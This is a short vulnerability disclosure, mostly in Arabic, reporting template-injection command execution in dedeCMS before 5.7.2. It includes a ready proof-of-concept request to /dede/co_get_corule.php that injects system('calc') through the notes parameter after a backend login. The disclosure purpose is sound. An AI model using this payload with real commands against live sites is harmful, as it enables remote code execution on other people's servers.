
cve报告
مؤلف الثغرة: Ewoji
الإصدار المتأثر: dedeCMS < 5.7.2
البائع: Shanghai Zhuozhuo Network Technology Co., LTD
البرنامج: dedeCMS
ملفات الثغرة:
/include/dedetag.class.phpبعد التثبيت، قم بتسجيل الدخول إلى الخلفية
استغلال القالب
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1، وقد يؤدي الوصول مرتين إلى تنفيذ الأمرالتحقق من الاستغلال:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command